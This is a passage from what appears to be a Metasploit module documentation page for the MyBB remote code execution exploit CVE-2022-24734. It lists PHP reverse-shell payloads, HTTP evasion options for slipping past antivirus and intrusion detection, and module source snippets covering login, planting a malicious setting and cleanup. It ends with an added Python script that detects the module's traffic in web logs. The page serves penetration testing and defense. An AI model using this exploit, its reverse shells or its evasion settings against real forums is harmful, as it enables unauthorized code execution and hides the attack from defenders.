| 17 | payload/php/meterpreter/reverse_tcp_uuid | | normal | No | PHP Meterpreter, PHP Reverse TCP Stager |
| 18 | payload/php/meterpreter_reverse_tcp | | normal | No | PHP Meterpreter, Reverse TCP Inline |
| 19 | payload/php/reverse_perl | | normal | No | PHP Command, Double Reverse TCP Connection (via Perl) |
| 20 | payload/php/reverse_php | | normal | No | PHP Command Shell, Reverse TCP (via PHP) |
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/mybb_rce_cve_2022_24734 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > show evasion
Module evasion options:
| Name | Current Setting | Required | Description |
|---|---|---|---|
| HTTP::chunked | false | no | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | none | no | Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate) |
| HTTP::header_folding | false | no | Enable folding of HTTP headers |
| HTTP::junk_headers | false | no | Enable insertion of random junk HTTP headers |
| HTTP::method_random_case | false | no | Use random casing for the HTTP method |
| HTTP::method_random_invalid | false | no | Use a random invalid, HTTP method for request |
| HTTP::method_random_valid | false | no | Use a random, but valid, HTTP method for request |
| HTTP::no_cache | false | no | Disallow the browser to cache HTTP content |
| HTTP::pad_fake_headers | false | no | Insert random, fake headers into the HTTP request |
| HTTP::pad_fake_headers_count | 0 | no | How many fake headers to insert into the HTTP request |
| HTTP::pad_get_params | false | no | Insert random, fake query string variables into the request |
| HTTP::pad_get_params_count | 16 | no | How many fake query string variables to insert into the request |
| HTTP::pad_method_uri_count | 1 | no | How many whitespace characters to use between the method and uri |
| HTTP::pad_method_uri_type | space | no | What type of whitespace to use between the method and uri (Accepted: space, tab, apache) |
| HTTP::pad_post_params | false | no | Insert random, fake post variables into the request |
| HTTP::pad_post_params_count | 16 | no | How many fake post variables to insert into the request |
| HTTP::pad_uri_version_count | 1 | no | How many whitespace characters to use between the uri and version |
| HTTP::pad_uri_version_type | space | no | What type of whitespace to use between the uri and version (Accepted: space, tab, apache) |
| HTTP::server_name | Apache | yes | Configures the Server header of all outgoing replies |
| HTTP::uri_dir_fake_relative | false | no | Insert fake relative directories into the uri |
| HTTP::uri_dir_self_reference | false | no | Insert self-referential directories into the uri |
| HTTP::uri_encode_mode | hex-normal | no | Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random) |
| HTTP::uri_fake_end | false | no | Add a fake end of URI (eg: /%20HTTP/1.0/../../) |
| HTTP::uri_fake_params_start | false | no | Add a fake start of params to the URI (eg: /%3fa=b/../) |
| HTTP::uri_full_url | false | no | Use the full URL for all HTTP requests |
| HTTP::uri_use_backslashes | false | no | Use back slashes instead of forward slashes in the uri |
| HTTP::version_random_invalid | false | no | Use a random invalid, HTTP version for request |
| HTTP::version_random_valid | false | no | Use a random, but valid, HTTP version for request |
| TCP::max_send_size | 0 | no | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | 0 | no | Delays inserted before every send. (0 = disable) |
Error Messages
This module may fail with the following error messages:
- <PEER> - Could not connect to web service - no response
- <PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
- <PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>
- <PEER> - Could not connect to web service - no response
- <PEER> - Invalid credentials
- <PEER> - Could not connect to web service - no response
- <PEER> - Supplied user doesn't have the rights to add a setting
- User session is not valid anymore. Trying to login again to cleanup
- <PEER> - URI not found in `Modify Settings` page - cannot cleanup
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
res = send_request_cgi({
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'method' => 'GET',
  'vars_get' => { 'intcheck' => 1 }
})
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

# see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
unless res.body.include?('MYBB')
  return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>
Here is a relevant code snippet related to the "<PEER> - Check URI Path, unexpected HTTP response code: <RES.CODE>" error message:
  'uri' => normalize_uri(target_uri.path, 'index.php'),
  'method' => 'GET',
  'vars_get' => { 'intcheck' => 1 }
})
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

# see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
unless res.body.include?('MYBB')
  return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
end
<PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>
Here is a relevant code snippet related to the "<PEER> - Cannot find MyBB forum running at <TARGET_URI.PATH>" error message:
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

# see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310
unless res.body.include?('MYBB')
  return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")
end

print_good("MyBB forum found running at #{target_uri.path}")

return CheckCode::Detected
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
    'username' => datastore['USERNAME'],
    'password' => datastore['PASSWORD'],
    'do' => 'login'
  }
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)
  fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
end

print_good('Login successful!')
<PEER> - Invalid credentials
Here is a relevant code snippet related to the "<PEER> - Invalid credentials" error message:
      'do' => 'login'
    }
  })
  fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
  unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)
    fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")
  end

  print_good('Login successful!')
end
<PEER> - Could not connect to web service - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to web service - no response" error message:
    }.merge(vars_get)
  }
  req_hash['vars_post'] = vars_post unless vars_post.blank?
  res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)
  if check_response && res.nil?
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")
  end
  res
end

def exploit
<PEER> - Supplied user doesn't have the rights to add a setting
Here is a relevant code snippet related to the "<PEER> - Supplied user doesn't have the rights to add a setting" error message:
def exploit
  login

  res = send_config_settings
  if res.body.include?('Access Denied')
    fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")
  end

  vprint_status('Adding a malicious settings')
  doc = res.get_html_document
  @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text
User session is not valid anymore. Trying to login again to cleanup
Here is a relevant code snippet related to the "User session is not valid anymore. Trying to login again to cleanup" error message:
vprint_status('Grab the delete parameters')
res = send_config_settings(action: 'manage')
if res.body.include?('<title>MyBB Control Panel - Login</title>')
  # this exploit seems to logout users sometimes, so, try to login again and retry
  print_status('User session is not valid anymore. Trying to login again to cleanup')
  login
  res = send_config_settings(action: 'manage')
end

doc = res.get_html_document
<PEER> - URI not found in `Modify Settings` page - cannot cleanup
Here is a relevant code snippet related to the "<PEER> - URI not found in `Modify Settings` page - cannot cleanup" error message:
control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')
uri = control_links.detect do |href|
  href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")
end
if uri.nil?
  print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")
  return
end

vprint_status('Send the delete request')
params = uri.text.split('?')[1]
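A defender-side complement to the error-message snippets above. The following Python script is an added example, not code from the module or from the Metasploit documentation. It walks web server access logs for the request sequence the module's check, login and cleanup steps leave behind (the index.php?intcheck=1 probe, then action=manage and action=delete together with my_post_key under the Admin CP) and reports clients that issue the probe and then touch admin settings within a short window. The combined log format, the "/admin/" path fragment, the ten-minute window and the sample log lines are assumptions constructed for the example; the request markers themselves come from the snippets above.

```python
"""Flag the request sequence the module's check/exploit/cleanup steps leave in web logs.

Added example; not part of the Metasploit module or its documentation.
Assumptions (not taken from the page): Apache/nginx combined log format and a
MyBB Admin CP served under a path containing "/admin/" (MyBB's default).
The request markers (index.php?intcheck=1, action=manage, action=delete with
my_post_key) are the ones used in the module snippets above.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
ADMIN_PATH_FRAGMENT = "/admin/"   # assumption: default MyBB Admin CP location
WINDOW = timedelta(minutes=10)    # probe and admin activity must fall inside this
PROBE_RE = re.compile(r"/index\.php\?(?:[^#]*&)?intcheck=1(?:&|$)")

# Constructed sample traffic (not real logs). 203.0.113.7 performs the full
# probe -> admin settings sequence; 198.51.100.4 only does routine admin work;
# 192.0.2.9 probes but its admin activity falls outside the window.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2022:12:00:01 +0000] "GET /forum/index.php?intcheck=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2022:12:00:02 +0000] "POST /forum/admin/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2022:12:00:06 +0000] "GET /forum/admin/index.php?action=manage HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2022:12:00:07 +0000] "GET /forum/admin/index.php?action=delete&my_post_key=CONSTRUCTEDKEY HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2022:12:05:00 +0000] "GET /forum/admin/index.php?action=manage HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2022:12:30:00 +0000] "GET /forum/index.php?intcheck=1 HTTP/1.1" 200 12 "-" "curl/7.81.0"
192.0.2.9 - - [10/Mar/2022:14:00:00 +0000] "GET /forum/admin/index.php?action=manage HTTP/1.1" 200 9000 "-" "curl/7.81.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def classify(path):
    """Map a request path to the module step it resembles, or None."""
    if PROBE_RE.search(path):
        return "probe"                 # check(): GET index.php?intcheck=1
    if ADMIN_PATH_FRAGMENT in path:
        if "action=delete" in path and "my_post_key=" in path:
            return "settings_delete"   # cleanup: the delete link the module searches for
        if "action=manage" in path:
            return "settings_manage"   # cleanup: the Modify Settings page
    return None


def find_suspicious(log_text):
    """Return {ip: [steps]} for clients whose probe is followed, within WINDOW,
    by admin settings activity. Admin settings work on its own is normal
    administration and is not reported; a fingerprint probe followed by it
    from the same client is what warrants a closer look."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        step = classify(req["path"])
        if step:
            events[req["ip"]].append((req["ts"], step))

    hits = {}
    for ip, evs in events.items():
        evs.sort()
        for p_ts, step in evs:
            if step != "probe":
                continue
            follow = [s for ts, s in evs if s != "probe" and p_ts <= ts <= p_ts + WINDOW]
            if follow:
                hits[ip] = ["probe"] + follow
                break
    return hits


if __name__ == "__main__":
    for ip, steps in find_suspicious(SAMPLE_LOG).items():
        print(f"{ip}: {' -> '.join(steps)}")
```

Only the probe-then-admin ordering is reported, so an administrator editing settings during normal work is not flagged; the window keeps an old probe from tainting unrelated admin sessions hours later. Feed real logs through `find_suspicious` and adjust ADMIN_PATH_FRAGMENT if the Admin CP has been renamed.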
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f
- https://www.zerodayinitiative.com/advisories/ZDI-22-503/
- https://github.com/Altelus1/CVE-2022-24734
- CVE-2022-24734
See Also
Check also the following modules related to this module:
- auxiliary/gather/mybb_db_fingerprint
- exploit/unix/webapp/mybb_backdoor
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
- exploit/multi/sap/cve_2020_6207_solman_rs
- exploit/linux/fileformat/unrar_cve_2022_30333
- exploit/linux/http/apache_spark_rce_cve_2022_33891
- exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
- exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
- exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
- exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/http/zimbra_cpio_cve_2022_41352
- exploit/linux/http/zimbra_mboximport_cve_2022_27925
- exploit/linux/http/zimbra_unrar_cve_2022_30333
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219
- exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
Authors
- Cillian Collins
- Altelus
- Christophe De La Fuente
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.